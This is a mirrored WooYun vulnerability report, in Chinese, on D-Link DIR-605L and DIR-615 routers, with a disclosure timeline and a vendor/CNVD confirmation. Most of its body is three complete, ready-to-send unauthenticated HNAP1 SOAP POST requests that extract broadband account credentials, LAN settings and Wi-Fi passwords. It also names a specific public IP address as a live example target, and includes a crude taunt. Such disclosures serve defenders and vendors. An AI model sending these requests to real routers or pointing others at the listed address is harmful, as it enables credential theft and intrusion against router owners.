乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-01: 细节已通知厂商并且等待厂商处理中 2014-07-05: 厂商已经确认,细节仅向厂商公开 2014-07-08: 细节向第三方安全合作伙伴开放 2014-08-29: 细节向核心白帽子及相关领域专家公开 2014-09-08: 细节向普通白帽子公开 2014-09-18: 细节向实习白帽子公开 2014-09-29: 细节向公众公开
获取外网IP地址直接POST发包可以获取宽带帐号,wifi密码等信息。如有不服,你他吗的来打我。。
固件版本 : 1.12硬件版本 : Ax型号 : DIR-605L添加:型号 DIR-615同样受影响。获取宽带帐号等信息
POST /HNAP1/ HTTP/1.0Connection: keep-aliveContent-Length: 331SOAPAction: "http://purenetworks.com/HNAP1/GetWanSettings"Host: 地址:8080Accept: text/html, */*Accept-Encoding: identityUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1<?xml version="1.0" encoding="utf-8"?><soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWanSettings xmlns="http://purenetworks.com/HNAP1/"> </GetWanSettings> </soap:Body></soap:Envelope>
获取路由内网地址信息
POST /HNAP1/ HTTP/1.0Connection: keep-aliveContent-Length: 343SOAPAction: "http://purenetworks.com/HNAP1/GetRouterLanSettings"Host: 地址:8080Accept: text/html, */*Accept-Encoding: identityUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1<?xml version="1.0" encoding="utf-8"?><soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterLanSettings xmlns="http://purenetworks.com/HNAP1/"> </GetRouterLanSettings> </soap:Body></soap:Envelope>
获取wifi密码等信息
POST /HNAP1/ HTTP/1.0Connection: keep-aliveContent-Length: 380SOAPAction: "http://purenetworks.com/HNAP1/GetWLanRadioSecurity"Host: 地址:8080Accept: text/html, */*Accept-Encoding: identityUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1<?xml version="1.0" encoding="utf-8"?><soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"> <RadioID>2.4GHZ</RadioID> </GetWLanRadioSecurity> </soap:Body></soap:Envelope>
案例:http://27.45.196.132:8080/
。。
危害等级:高
漏洞Rank:17
确认时间:2014-07-05 23:39
CNVD确认并在多个实例上复现所情况,并与wooyun-2014-一并由CNVD通过公开联系渠道向设备生产厂商友迅电子设备(上海)有限公司通报。生产厂商反馈称新固件已经解决相关问题。
暂无